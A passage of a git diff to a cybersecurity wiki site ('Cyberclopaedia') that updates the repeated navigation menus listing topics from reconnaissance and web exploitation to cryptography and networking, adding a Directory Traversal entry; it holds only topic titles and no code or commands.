      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -180,22 +180,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/index.html b/docs/Reverse Engineering/Binary Formats/PE/index.html index 51a0d443..9731e391 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/index.html +++ b/docs/Reverse Engineering/Binary Formats/PE/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -181,22 +181,6 @@

Structure

- - diff --git a/docs/Reverse Engineering/Binary Formats/Reverse Engineering Android Applications.html b/docs/Reverse Engineering/Binary Formats/Reverse Engineering Android Applications.html index 29bb9a6b..41a1ca7b 100644 --- a/docs/Reverse Engineering/Binary Formats/Reverse Engineering Android Applications.html +++ b/docs/Reverse Engineering/Binary Formats/Reverse Engineering Android Applications.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
